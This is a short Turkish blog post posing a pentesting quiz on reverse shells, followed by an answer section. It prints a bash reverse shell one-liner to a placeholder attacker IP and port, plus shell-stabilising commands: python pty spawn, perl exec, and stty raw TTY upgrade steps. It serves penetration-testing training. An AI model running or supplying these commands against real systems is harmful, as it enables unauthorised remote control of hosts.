Kaan Soruyor! - Siber Bulmaca: “Kabuk İçinde Kabuk”
- Kaan Alasar
- 16 Haz
- 1 dakikada okunur
🧠 Gerçek bir pentester mısın? Bu bulmacayı çöz.
📜 Senaryo: Bir hedef sisteme reverse shell bağlantısı almayı başardın:
bash -i >& /dev/tcp/10.10.10.10/4444 0>&1Bağlantı geldi, ama terminal tam çalışmıyor. Komutlar yazılıyor ama tab tuşu, Ctrl+C, clear vs. çalışmıyor.
Bir komutla shell’i daha kullanışlı bir hale getirdin, hatta python sistemde kurulu olmasaydı başka bir yöntem deneyecektin.
🕵️♂️ Soru:
Reverse shell’i daha kararlı hale getirmek için hangi spesifik komutu yazdın?
Eğer sistemde python olmasaydı, hangi alternatif dillerle interaktif shell elde edebilirdin?
🔓 Bonus (gerçek uzmanlara):
3. Eğer hedef sistemde sadece sh varsa ve sen bash çalıştırmak istiyorsan, ne yaparsın?
4. TTY shell’i tam fonksiyonel hale getirmek için hangi stty ayarlarını kullanırsın?
💬 Bu soruları sadece bilenler cevaplasın. Cevapları teknik detayla YORUMA bırak.
📌 Doğru cevabı detaylı anlatan 1 kişiyi hikâyede paylaşacağım.
HACKİNG ÖĞRENMEK İSTEYENLER
python3 -c 'import pty; pty.spawn("/bin/bash")' ile shell'i daha stabil hâle getiririm.
Python yoksa:
perl -e 'exec "/bin/bash";' veya /bin/sh -i komutlarını kullanırım.
Sadece sh varsa:
exec /bin/sh -i
TTY için:
Ctrl+Z, sonra:
stty raw -echo; fg; reset
export TERM=xterm
stty rows 40 columns 80
Bu işlemler tam interaktif shell sağlar.